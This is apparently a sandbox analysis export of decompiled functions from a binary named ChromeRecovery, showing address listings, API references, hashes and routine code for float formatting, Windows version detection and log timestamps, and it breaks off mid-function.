0x00c8fc3a
0x00c8fc44
0x00c8fc45
0x00c8fc4b
0x00c8fc4d
0x00c9014b
0x00c9014d
0x00c9014f
0x00c90155
0x00c90157
0x00c9015d
0x00c9015f
0x00c90541
0x00c90541
0x00c90543
0x00c90549
0x00c90550
0x00c90556
0x00c90558
0x00c9060b
0x00c9060b
0x00c9060d
0x00c9060e
0x00c90614
0x00000000
0x00c9055e
0x00c9055e
0x00c90560
0x00c90566
0x00c9056c
0x00c9056e
0x00c90574
0x00c9057b
0x00c9057b
0x00c9057d
0x00c9057d
0x00c9058a
0x00c90591
0x00c90597
0x00c9059a
0x00c9059b
0x00c905a1
0x00c905a1
0x00c905a5
0x00c905a7
0x00c905ad
0x00c905b3
0x00c905b6
0x00000000
0x00c905b8
0x00c905b8
0x00c905bf
0x00c905bf
0x00c905b6
0x00c905a7
0x00c9056e
0x00c90560
0x00c90558
0x00c90165
0x00c90165
0x00c90165
0x00c90168
0x00c9016c
0x00c9016c
0x00c9016d
0x00c9017f
0x00c9018c
0x00c9019b
0x00c901c5
0x00c901ca
0x00c901d0
0x00c901d3
0x00c901d9
0x00c901db
0x00c902ad
0x00c902b3
0x00c9037d
0x00c90383
0x00c90389
0x00c90389
0x00c90389
0x00c9038c
0x00c9038e
0x00c9038e
0x00c90394
0x00c9039a
0x00c9039c
0x00c903b8
0x00c903c4
0x00c903ca
0x00c903d0
0x00c9039e
0x00c903a4
0x00c903b0
0x00c903b0
0x00c903d6
0x00c903d8
0x00c903da
0x00c903e0
0x00c903e2
0x00c904f3
0x00c904f3
0x00c904f9
0x00c904fe
0x00c904fe
0x00c90501
0x00c90502
0x00000000
0x00c903e8
0x00c903e8
0x00c903e8
0x00c903ec
0x00c9040c
0x00c9040e
0x00c90410
0x00c90416
0x00c9041c
0x00c90422
0x00c90428
0x00c9042a
0x00c9042a
0x00c9042d
0x00000000
0x00000000
0x00c9042f
0x00c90431
0x00c90433
0x00c9043b
0x00c9043e
0x00c9043e
0x00c90440
0x00c90440
0x00c9044c
0x00c9044f
0x00c90455
0x00c90464
0x00c90467
0x00c9046e
0x00c90474
0x00c90477
0x00c90478
0x00c90479
0x00c9047f
0x00c90485
0x00c9048b
0x00000000
0x00000000
0x00000000
0x00c9048b
0x00c9048d
0x00c9048f
0x00c90497
0x00c9049a
0x00c904a0
0x00c904a0
0x00c904a3
0x00000000
0x00000000
0x00c904a5
0x00c904a7
0x00c904a9
0x00c904a9
0x00c904ac
0x00c904af
0x00c904af
0x00c904b5
0x00c904bc
0x00c904be
0x00c904bf
0x00c904c1
0x00c904c1
0x00c904c3
0x00c904c9
0x00c904cb
0x00c904cd
0x00000000
0x00c904cd
0x00000000
0x00c904cb
0x00c904a0
0x00c904d5
0x00c904d5
0x00c904d5
0x00c904db
0x00c904de
0x00c905c7
0x00000000
0x00c904e4
0x00c904e4
0x00000000
0x00c904e4
0x00c903ee
0x00c903ee
0x00c903f0
0x00c903f6
0x00c903fe
0x00c903fe
0x00c90401
0x00c90401
0x00000000
0x00c903f0
0x00000000
0x00c904ea
0x00c904ea
0x00c904eb
0x00c904eb
0x00000000
0x00c903e8
0x00c902b9
0x00c902b9
0x00c902c4
0x00c902d0
0x00c902dd
0x00c902e5
0x00c902ea
0x00c902ed
0x00c902ef
0x00c9030b
0x00c9030d
0x00000000
0x00c90313
0x00c90313
0x00c9031a
0x00000000
0x00c90320
0x00c90326
0x00c90328
0x00c9032e
0x00c9032e
0x00c90330
0x00c90330
0x00c90336
0x00c9033f
0x00c90346
0x00c90349
0x00c9034a
0x00c9034c
0x00c9034c
0x00c90354
0x00c90356
0x00000000
0x00c9035c
0x00c9035c
0x00c90362
0x00c90365
0x00c905cc
0x00c905cf
0x00c905d5
0x00c905ea
0x00c905ef
0x00c905f2
0x00c9036b
0x00c9036b
0x00c90372
0x00000000
0x00c90372
0x00c90365
0x00c90356
0x00c9031a
0x00c902f1
0x00c902f3
0x00c902f9
0x00c902ff
0x00c90300
0x00c90508
0x00c90508
0x00c9050f
0x00c90510
0x00c90511
0x00c90516
0x00c90519
0x00c90519
0x00c90519
0x00c902ef
0x00c901e1
0x00c901e1
0x00c901e7
0x00c901e9
0x00c90221
0x00c90223
0x00000000
0x00c90225
0x00c90225
0x00c9022c
0x00000000
0x00c9022e
0x00c90234
0x00c90236
0x00c9023c
0x00c9023c
0x00c9023e
0x00c9023e
0x00c90240
0x00c90249
0x00c90250
0x00c90253
0x00c90254
0x00c90256
0x00c90256
0x00c9025e
0x00c90260
0x00000000
0x00c90262
0x00c90262
0x00c90268
0x00c9026b
0x00c9027f
0x00c90285
0x00c9029e
0x00c902a3
0x00c902a6
0x00000000
0x00c9026d
0x00c9026d
0x00c90274
0x00000000
0x00c90274
0x00c9026b
0x00c90260
0x00c9022c
0x00000000
0x00c901eb
0x00c901eb
0x00c901ee
0x00c901f4
0x00c9020d
0x00c90212
0x00c90215
0x00c90215
0x00c90215
0x00c90217
0x00c90217
0x00c90217
0x00c9051b
0x00c9051b
0x00c9051d
0x00c905f9
0x00c90600
0x00c90607
0x00c9061a
0x00c90620
0x00c90621
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c90523
0x00c90529
0x00c90529
0x00c9052f
0x00c9052f
0x00c9053b
0x00000000
0x00c9053b
0x00c8fc53
0x00c8fc53
0x00c8fc55
0x00c8fc5b
0x00c8fc5d
0x00c8fc63
0x00c8fc65
0x00c90060
0x00c90060
0x00c90062
0x00c90068
0x00c9006f
0x00c90075
0x00c90077
0x00c900db
0x00c900dd
0x00c900e3
0x00c900e9
0x00c900eb
0x00c900f1
0x00c900f8
0x00c900f8
0x00c900fa
0x00c900fa
0x00c90107
0x00c9010e
0x00c90114
0x00c90117
0x00c90118
0x00c9011e
0x00c9011e
0x00c90122
0x00c90124
0x00c9012a
0x00c90130
0x00c90133
0x00000000
0x00c90139
0x00c90139
0x00c90140
0x00c90140
0x00c90133
0x00c90124
0x00c900eb
0x00c90079
0x00c90079
0x00c9007b
0x00c90081
0x00c90087
0x00000000
0x00c90087
0x00c90077
0x00c8fc6b
0x00c8fc6b
0x00c8fc6b
0x00c8fc6e
0x00c8fc72
0x00c8fc72
0x00c8fc73
0x00c8fc85
0x00c8fc92
0x00c8fca1
0x00c8fccb
0x00c8fcd0
0x00c8fcd6
0x00c8fcd9
0x00c8fcdf
0x00c8fce1
0x00c8fdb3
0x00c8fdb9
0x00c8fe99
0x00c8fe9f
0x00c8fea5
0x00c8fea5
0x00c8fea5
0x00c8fea8
0x00c8feaa
0x00c8feaa
0x00c8feb0
0x00c8feb6
0x00c8feb8
0x00c8fed4
0x00c8fee0
0x00c8fee6
0x00c8feec
0x00c8feba
0x00c8fec0
0x00c8fecc
0x00c8fecc
0x00c8fef2
0x00c8fef4
0x00c8fef6
0x00c8fefc
0x00c8fefe
0x00c90016
0x00c90016
0x00c9001c
0x00c90021
0x00c90021
0x00c90024
0x00c90025
0x00000000
0x00c8ff04
0x00c8ff04
0x00c8ff04
0x00c8ff08
0x00c8ff28
0x00c8ff2a
0x00c8ff2c
0x00c8ff32
0x00c8ff38
0x00c8ff3e
0x00c8ff44
0x00c8ff46
0x00c8ff46
0x00c8ff49
0x00000000
0x00000000
0x00c8ff4b
0x00c8ff4d
0x00c8ff4f
0x00c8ff57
0x00c8ff5a
0x00c8ff5a
0x00c8ff5c
0x00c8ff5c
0x00c8ff68
0x00c8ff6b
0x00c8ff71
0x00c8ff81
0x00c8ff8a
0x00c8ff91
0x00c8ff97
0x00c8ff9a
0x00c8ff9b
0x00c8ffa1
0x00c8ffa2
0x00c8ffa8
0x00c8ffae
0x00000000
0x00000000
0x00000000
0x00c8ffae
0x00c8ffb0
0x00c8ffb2
0x00c8ffba
0x00c8ffbd
0x00c8ffc3
0x00c8ffc3
0x00c8ffc6
0x00000000
0x00000000
0x00c8ffc8
0x00c8ffca
0x00c8ffcc
0x00c8ffcc
0x00c8ffcf
0x00c8ffd2
0x00c8ffd2
0x00c8ffd8
0x00c8ffdf
0x00c8ffe1
0x00c8ffe2
0x00c8ffe4
0x00c8ffe4
0x00c8ffe6
0x00c8ffec
0x00c8ffee
0x00c8fff0
0x00000000
0x00c8fff0
0x00000000
0x00c8ffee
0x00c8ffc3
0x00c8fff8
0x00c8fff8
0x00c8fff8
0x00c8fffe
0x00c90001
0x00c9008a
0x00c9008c
0x00c90091
0x00c90097
0x00c9009d
0x00c9009e
0x00000000
0x00c90007
0x00c90007
0x00000000
0x00c90007
0x00c8ff0a
0x00c8ff0a
0x00c8ff0c
0x00c8ff12
0x00c8ff1a
0x00c8ff1a
0x00c8ff1d
0x00c8ff1d
0x00000000
0x00c8ff0c
0x00000000
0x00c9000d
0x00c9000d
0x00c9000e
0x00c9000e
0x00000000
0x00c8ff04
0x00c8fdbf
0x00c8fdbf
0x00c8fdca
0x00c8fdd6
0x00c8fde3
0x00c8fdeb
0x00c8fdf0
0x00c8fdf3
0x00c8fdf5
0x00c8fe11
0x00c8fe13
0x00000000
0x00c8fe19
0x00c8fe19
0x00c8fe20
0x00000000
0x00c8fe26
0x00c8fe2c
0x00c8fe2e
0x00c8fe34
0x00c8fe34
0x00c8fe36
0x00c8fe36
0x00c8fe3c
0x00c8fe45
0x00c8fe4c
0x00c8fe4f
0x00c8fe50
0x00c8fe52
0x00c8fe52
0x00c8fe5a
0x00c8fe5c
0x00000000
0x00c8fe62
0x00c8fe62
0x00c8fe68
0x00c8fe6b
0x00c8fe81
0x00c8fe87
0x00c8fe8d
0x00c8fe8e
0x00c900a4
0x00c900a4
0x00c900ab
0x00c900ac
0x00c900ad
0x00c900b2
0x00c900b5
0x00c8fe6d
0x00c8fe6d
0x00c8fe74
0x00000000
0x00c8fe74
0x00c8fe6b
0x00c8fe5c
0x00c8fe20
0x00c8fdf7
0x00c8fdf9
0x00c8fdff
0x00c8fe05
0x00c8fe06
0x00c9002b
0x00c9002b
0x00c90032
0x00c90033
0x00c90034
0x00c90039
0x00c9003c
0x00c9003c
0x00c9003c
0x00c8fdf5
0x00c8fce7
0x00c8fce7
0x00c8fced
0x00c8fcef
0x00c8fd27
0x00c8fd29
0x00000000
0x00c8fd2b
0x00c8fd2b
0x00c8fd32
0x00000000
0x00c8fd34
0x00c8fd3a
0x00c8fd3c
0x00c8fd42
0x00c8fd42
0x00c8fd44
0x00c8fd44
0x00c8fd46
0x00c8fd4f
0x00c8fd56
0x00c8fd59
0x00c8fd5a
0x00c8fd5c
0x00c8fd5c
0x00c8fd64
0x00c8fd66
0x00000000
0x00c8fd68
0x00c8fd68
0x00c8fd6e
0x00c8fd71
0x00c8fd85
0x00c8fd8b
0x00c8fda4
0x00c8fda9
0x00c8fdac
0x00000000
0x00c8fd73
0x00c8fd73
0x00c8fd7a
0x00000000
0x00c8fd7a
0x00c8fd71
0x00c8fd66
0x00c8fd32
0x00000000
0x00c8fcf1
0x00c8fcf1
0x00c8fcf4
0x00c8fcfa
0x00c8fd13
0x00c8fd18
0x00c8fd1b
0x00c8fd1b
0x00c8fd1b
0x00c8fd1d
0x00c8fd1d
0x00c8fd1d
0x00c9003e
0x00c9003e
0x00c90040
0x00c900b9
0x00c900c0
0x00c900c0
0x00c900c0
0x00c900c7
0x00c900c9
0x00c900cf
0x00c900d0
0x00c90627
0x00c90627
0x00c90628
0x00c90629
0x00c9062e
0x00000000
0x00000000
0x00000000
0x00000000
0x00c90042
0x00c90048
0x00c90048
0x00c9004e
0x00c9004e
0x00c9005a
0x00000000
0x00c9005a
0x00c8fc65
0x00c90631
0x00c90631
0x00c90637
0x00c9063d
0x00c90643
0x00c90645
0x00c90647
0x00c9064e
0x00c9064e
0x00c90650
0x00c90650
0x00c90659
0x00c9065a
0x00c90662
0x00c90669
0x00c9066c
0x00c9066d
0x00c90673
0x00c90673
0x00c90677
0x00c9067d
0x00c9067f
0x00c90681
0x00c90687
0x00c9068a
0x00c9069b
0x00c9069e
0x00c906a4
0x00c906b9
0x00c906be
0x00c9068c
0x00c9068c
0x00c90693
0x00c90693
0x00c9068a
0x00c9067f
0x00c906cf
0x00c906d6
0x00c906de
0x00c906df
0x00c906e1
0x00c9084b
0x00c9084d
0x00c9085d
0x00c90860
0x00c90862
0x00000000
0x00c9084f
0x00c90855
0x00000000
0x00c90855
0x00000000
0x00c906e7
0x00c906e7
0x00c906ed
0x00c906f0
0x00c906f6
0x00c906f9
0x00c906ff
0x00c90705
0x00c90707
0x00c90709
0x00c9070b
0x00c9070b
0x00c9070d
0x00c9070d
0x00c9071a
0x00c90721
0x00c90724
0x00c90725
0x00c90727
0x00c90728
0x00c90728
0x00c90730
0x00c90736
0x00c90738
0x00c9073e
0x00c90740
0x00c90746
0x00c90749
0x00c90823
0x00c90829
0x00c9083e
0x00c90843
0x00c9074f
0x00c90755
0x00c9075c
0x00c9075c
0x00c9075c
0x00c9075c
0x00c90749
0x00c90762
0x00c90762
0x00c90768
0x00c90768
0x00c90768
0x00c9076e
0x00c90774
0x00c90777
0x00c9077d
0x00c9077f
0x00c90781
0x00c90787
0x00c90789
0x00c9078d
0x00c9078f
0x00c9078f
0x00c9078f
0x00c9078d
0x00c90787
0x00c90794
0x00c90795
0x00c90797
0x00c90799
0x00c90799
0x00c9079b
0x00c9079d
0x00c9079f
0x00c907a5
0x00c907ab
0x00c907ad
0x00c907b3
0x00c907b3
0x00c907b9
0x00c907bf
0x00c907c1
0x00000000
0x00000000
0x00c907c7
0x00c907c9
0x00c907c9
0x00c907cb
0x00c907cb
0x00c907d7
0x00c907db
0x00c907e2
0x00c907e5
0x00c907e6
0x00c907e8
0x00c907e8
0x00c907f0
0x00c907f6
0x00c907f8
0x00c907fe
0x00c90804
0x00c9080a
0x00c9080d
0x00c9086d
0x00c90870
0x00c90876
0x00c9088b
0x00c90890
0x00c9080f
0x00c90811
0x00c90818
0x00c90818
0x00c9080d
0x00c908a1
0x00c908ae
0x00c908b8
0x00c908b8
0x00c908ba
0x00c908c2
0x00c908c8
0x00c908cb
0x00c908d1
0x00c908d3
0x00c908e4
0x00000000
0x00c908d5
0x00c908d5
0x00c908d8
0x00c908e7
0x00c908e7
0x00c908da
0x00c908da
0x00c908dc
0x00c908dc
0x00c908d8
0x00c908ed
0x00c908ee
0x00c908f4
0x00c908f7
0x00c908f7
0x00c908ff
0x00c90902
0x00c90906
0x00c90906
0x00c90907
0x00c90909
0x00c9090f
0x00c90915
0x00000000
0x00000000
0x00000000
0x00c90915
0x00c907b3
0x00c9091b
0x00c9091b
0x00c9091e
0x00c90925
0x00000000
0x00c90927
0x00c90927
0x00c90929
0x00000000
0x00000000
0x00c90929
0x00000000
0x00c8f510
0x00c8f510
0x00c8f516
0x00c8f519
0x00c8f519
0x00c8f51c
0x00c8f56c
0x00c8f574
0x00c8f576
0x00000000
0x00c8f57c
0x00c9092b
0x00c9092b
0x00c9092b
0x00000000
0x00c9092b
0x00c8f51e
0x00c8f51e
0x00c8f51e
0x00c8f521
0x00c8f53b
0x00000000
0x00c8f523
0x00c8f523
0x00c8f523
0x00c8f526
0x00c8f534
0x00000000
0x00c8f528
0x00c8f528
0x00c8f52b
0x00000000
0x00c8f52d
0x00c8f52d
0x00000000
0x00c8f52d
0x00c8f52b
0x00c8f526
0x00c8f521
0x00c8f51c
0x00c8f4d6
0x00c8f4db
0x00c8f4e3
0x00c8f4f7
0x00c8f4fc
0x00c8f540
0x00c8f540
0x00c8f543
0x00c8f553
0x00c90954
0x00c90956
0x00c90957
0x00c90958
0x00c90959
0x00c9095a
0x00c9095b
0x00c90960
0x00c9096d
0x00c8f559
0x00c9092d
0x00c9092d
0x00c90936
0x00c9093f
0x00c90944
0x00c90953
0x00c90953
0x00000000
0x00000000
0x00000000
0x00c8f4e3

APIs

__floor_pentium4.LIBCMT ref: 00C8F60C

Strings

1#SNAN, xrefs: 00C8F534
1#IND, xrefs: 00C8F52D
1#INF, xrefs: 00C8F55E
1#QNAN, xrefs: 00C8F53B

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 50849e15e7f1b5b36e872339a58230b356a09d99fb538efdeaa360bbffbe8d6d
Instruction ID: 978d5bb459ca4f812e5511713eee72f216bef749951efc3489b4eb2037e51010
Opcode Fuzzy Hash: 50849e15e7f1b5b36e872339a58230b356a09d99fb538efdeaa360bbffbe8d6d
Instruction Fuzzy Hash: ABD22871E082288FDF65DE28DD447EAB7B5EB44305F2441EAD81DE7240E778AE828F45

Uniqueness

Uniqueness Score: -1.00%

Function 00C78E0B Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00C78E0B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v10;
				signed int _v12;
				struct _OSVERSIONINFOW _v292;
				signed int _v296;
				intOrPtr _v300;
				void* __ebp;
				signed int _t25;
				signed int _t35;
				signed int _t37;
				signed int _t40;
				signed int _t43;
				void* _t46;
				intOrPtr _t51;
				void* _t57;
				signed int _t59;
				struct HINSTANCE__* _t61;
				signed int _t62;

				_t57 = __edx;
				_t25 =  *0xca8008; // 0x617e0cdd
				_v8 = _t25 ^ _t62;
				_t59 = 0;
				_v292.dwOSVersionInfoSize = 0x11c;
				E00C81190(0,  &(_v292.dwMajorVersion), 0, 0x118);
				if(GetVersionExW( &_v292) == 0) {
					L8:
					L9:
					return E00C7F35B(_v8 ^ _t62);
				}
				_t51 = _v292.dwMajorVersion;
				if(_t51 == 6 || _t51 == 0xa) {
					_v296 = _t59;
					_v300 = _v292.dwMinorVersion;
					_t61 = E00C76765(L"kernel32.dll", _t57, __eflags);
					__eflags = _t61;
					if(_t61 == 0) {
						goto L8;
					}
					_t35 = GetProcAddress(_t61, "GetProductInfo");
					__eflags = _t35;
					if(_t35 != 0) {
						_t59 =  *_t35(_t51, _v300, _t59, _t59,  &_v296);
					}
					FreeLibrary(_t61);
					__eflags = _t59;
					if(_t59 == 0) {
						goto L8;
					}
					_t37 = _v296;
					__eflags = _t37 - 0x1b;
					if(__eflags > 0) {
						__eflags = _t37 - 0x54;
						if(__eflags > 0) {
							__eflags = _t37 - 0x79;
							if(_t37 < 0x79) {
								goto L8;
							}
							__eflags = _t37 - 0x7a;
							if(_t37 <= 0x7a) {
								_push(4);
								goto L22;
							}
							__eflags = _t37 - 0x7c;
							if(_t37 <= 0x7c) {
								goto L8;
							}
							__eflags = _t37 - 0x7e;
							if(_t37 <= 0x7e) {
								L34:
								_push(3);
								goto L22;
							}
							__eflags = _t37 + 0xffffff7f - 1;
							if(_t37 + 0xffffff7f > 1) {
								goto L8;
							}
							goto L34;
						}
						if(__eflags == 0) {
							goto L34;
						}
						_t40 = _t37 - 0x30;
						__eflags = _t40;
						if(_t40 == 0) {
							goto L12;
						}
						_t43 = _t40 - 0x16;
						__eflags = _t43;
						if(_t43 == 0) {
							goto L34;
						}
						__eflags = _t43 == 0;
						if(_t43 == 0) {
							goto L34;
						}
						goto L8;
					}
					if(__eflags == 0) {
						goto L34;
					}
					_t46 = _t37 - 1;
					__eflags = _t46 - 0x18;
					if(_t46 > 0x18) {
						goto L8;
					}
					switch( *((intOrPtr*)(( *(_t46 + 0xc78f97) & 0x000000ff) * 4 +  &M00C78F87))) {
						case 0:
							goto L12;
						case 1:
							goto L34;
						case 2:
							goto L21;
						case 3:
							goto L8;
					}
				} else {
					if(_t51 != 5) {
						goto L8;
					}
					if(_v292.dwMinorVersion != 2) {
						__eflags = _v292.dwMinorVersion - 1;
						if(_v292.dwMinorVersion != 1) {
							goto L8;
						}
						__eflags = _v12 & 0x00000200;
						if((_v12 & 0x00000200) != 0) {
							goto L8;
						}
						L12:
						goto L9;
					}
					if(_v10 != 1 || E00C78DBF() != 9) {
						if((_v12 & 0x00008000) == 0) {
							L21:
							_push(2);
							L22:
							goto L9;
						}
						goto L8;
					} else {
						goto L12;
					}
				}
			}

0x00c78e0b
0x00c78e14
0x00c78e1b
0x00c78e26
0x00c78e28
0x00c78e3a
0x00c78e51
0x00c78e8e
0x00c78e90
0x00c78e9e
0x00c78e9e
0x00c78e53
0x00c78e5c
0x00c78ec1
0x00c78ec7
0x00c78ed2
0x00c78ed4
0x00c78ed6
0x00000000
0x00000000
0x00c78ede
0x00c78ee4
0x00c78ee6
0x00c78efa
0x00c78efa
0x00c78efd
0x00c78f03
0x00c78f05
0x00000000
0x00000000
0x00c78f07
0x00c78f0d
0x00c78f10
0x00c78f34
0x00c78f37
0x00c78f54
0x00c78f57
0x00000000
0x00000000
0x00c78f5d
0x00c78f60
0x00c78f82
0x00000000
0x00c78f82
0x00c78f62
0x00c78f65
0x00000000
0x00000000
0x00c78f6b
0x00c78f6e
0x00c78f7e
0x00c78f7e
0x00000000
0x00c78f7e
0x00c78f75
0x00c78f78
0x00000000
0x00000000
0x00000000
0x00c78f78
0x00c78f39
0x00000000
0x00000000
0x00c78f3b
0x00c78f3b
0x00c78f3e
0x00000000
0x00000000
0x00c78f44
0x00c78f44
0x00c78f47
0x00000000
0x00000000
0x00c78f4a
0x00c78f4d
0x00000000
0x00000000
0x00000000
0x00c78f4f
0x00c78f12
0x00000000
0x00000000
0x00c78f14
0x00c78f15
0x00c78f18
0x00000000
0x00000000
0x00c78f25
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c78e63
0x00c78e66
0x00000000
0x00000000
0x00c78e6f
0x00c78e9f
0x00c78ea6
0x00000000
0x00000000
0x00c78ea8
0x00c78eaf
0x00000000
0x00000000
0x00c78eb1
0x00000000
0x00c78eb3
0x00c78e75
0x00c78e88
0x00c78f2c
0x00c78f2c
0x00c78f2e
0x00000000
0x00c78f2e
0x00000000
0x00000000
0x00000000
0x00000000
0x00c78e75

APIs

GetVersionExW.KERNEL32(0000011C), ref: 00C78E49
GetProcAddress.KERNEL32 ref: 00C78EDE
FreeLibrary.KERNEL32 ref: 00C78EFD

Part of subcall function 00C78DBF: GetModuleHandleW.KERNEL32 ref: 00C78DD6
Part of subcall function 00C78DBF: GetProcAddress.KERNEL32 ref: 00C78DE2

Strings

kernel32.dll, xrefs: 00C78EBC
GetProductInfo, xrefs: 00C78ED8

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AddressProc$FreeHandleLibraryModuleVersion
String ID: GetProductInfo$kernel32.dll
API String ID: 2785142305-182221857
Opcode ID: 27a0c95dae18173d495532141dee462fb545b33438c8c1d310e2cd3c7f78216c
Instruction ID: e683264386949d63ac8961cf2430e5ae56b2610a42319ddc8b7eb74ac15cc518
Opcode Fuzzy Hash: 27a0c95dae18173d495532141dee462fb545b33438c8c1d310e2cd3c7f78216c
Instruction Fuzzy Hash: AC311A349801199BDF389AE58C8DBEE7665BB06700FA8C496D72DD1090CF34CF8C8641

Uniqueness

Uniqueness Score: -1.00%

Function 00C73047 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00C73047(void* __ebx, signed int __ecx, signed int __edx, struct _SYSTEMTIME* __edi, void* __esi, intOrPtr _a4) {
				signed int _v12;
				struct _SYSTEMTIME _v28;
				signed int _v32;
				void* __ebp;
				signed int _t19;
				long _t21;
				long _t22;
				intOrPtr _t37;
				struct _SYSTEMTIME* _t43;
				signed int _t46;
				void* _t47;

				_t43 = __edi;
				_t41 = __edx;
				_t38 = __ecx;
				_t19 =  *0xca8008; // 0x617e0cdd
				_v12 = _t19 ^ _t46;
				_v32 = __edx;
				_t37 = _a4;
				if(__ecx != 0) {
					_t43 =  &_v28;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					GetLocalTime( &_v28);
					_push(_v28.wMilliseconds & 0x0000ffff);
					_push(_v28.wSecond & 0x0000ffff);
					_push(_v28.wMinute & 0x0000ffff);
					_push(_v28.wHour & 0x0000ffff);
					_t38 = 0x64;
					_t12 = (_v28.wYear & 0x0000ffff) % _t38;
					_t41 = _t12;
					_push(_t12);
					_push(_v28.wDay & 0x0000ffff);
					E00C77D9C(_t37, L"[%02d/%02d/%02d %02d:%02d:%02d.%03d]", _v28.wMonth & 0x0000ffff);
					_t47 = _t47 + 0x24;
				}
				_t21 = GetCurrentThreadId();
				_t22 = GetCurrentProcessId();
				_push(_t21);
				_push(_t22);
				E00C77DB1(_t37, _t38, _t41, _t43, _t37, L"[%s][%u:%u]", _v32);
				return E00C7F35B(_v12 ^ _t46);
			}

0x00c73047
0x00c73047
0x00c73047
0x00c7304d
0x00c73054
0x00c73057
0x00c7305b
0x00c73062
0x00c73066
0x00c73069
0x00c7306a
0x00c7306b
0x00c7306c
0x00c73071
0x00c7307d
0x00c73082
0x00c73087
0x00c7308c
0x00c73093
0x00c73094
0x00c73094
0x00c7309a
0x00c7309b
0x00c730a7
0x00c730ac
0x00c730ac
0x00c730af
0x00c730b7
0x00c730bd
0x00c730be
0x00c730c8
0x00c730de

APIs

GetLocalTime.KERNEL32 ref: 00C73071
GetCurrentThreadId.KERNEL32 ref: 00C730AF
GetCurrentProcessId.KERNEL32 ref: 00C730B7

Strings

[%02d/%02d/%02d %02d:%02d:%02d.%03d], xrefs: 00C730A1
[%s][%u:%u], xrefs: 00C730C2

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Current$LocalProcessThreadTime
String ID: [%02d/%02d/%02d %02d:%02d:%02d.%03d]$[%s][%u:%u]
API String ID: 2750998906-1978067781
Opcode ID: 100f69cce78d16b906841e2c2d51cbeafea4fe2147f0fef90fc6db975a95c4e0
Instruction ID: 0c0791b077f470ce854cac555b1b6b46ab2454d89791602f5441a74320e1da5d
Opcode Fuzzy Hash: 100f69cce78d16b906841e2c2d51cbeafea4fe2147f0fef90fc6db975a95c4e0
Instruction Fuzzy Hash: DF1170B2900119BFDB509BE9DC459BFB7FCEF4C701B004026FA05E2150D6398945D770

Uniqueness

Uniqueness Score: -1.00%

Function 00C8C8DF Relevance: 6.3, APIs: 4, Instructions: 337
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00C8C8DF(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t87;
				void* _t93;
				intOrPtr _t94;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t111;
				void* _t113;
				signed int _t114;
				void* _t115;
				void* _t118;
				void* _t120;
				void* _t122;
				signed int* _t124;
				void* _t127;
				signed int _t129;
				signed int _t131;
				signed int _t136;
				signed int* _t140;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				void* _t161;
				unsigned int _t162;
				intOrPtr _t171;
				signed int _t173;
				signed int* _t174;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				intOrPtr _t189;
				void* _t190;

				_t186 = _a24;
				if(_t186 < 0) {
					_t186 = 0;
				}
				_t183 = _a8;
				_t3 = _t186 + 0xb; // 0xb
				 *_t183 = 0;
				if(_a12 > _t3) {
					_t140 = _a4;
					_t147 = _t140[1];
					_t173 =  *_t140;
					__eflags = (_t147 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if(__eflags != 0) {
						__eflags = _t147;
						if(__eflags > 0) {
							L13:
							_t174 = _t183 + 1;
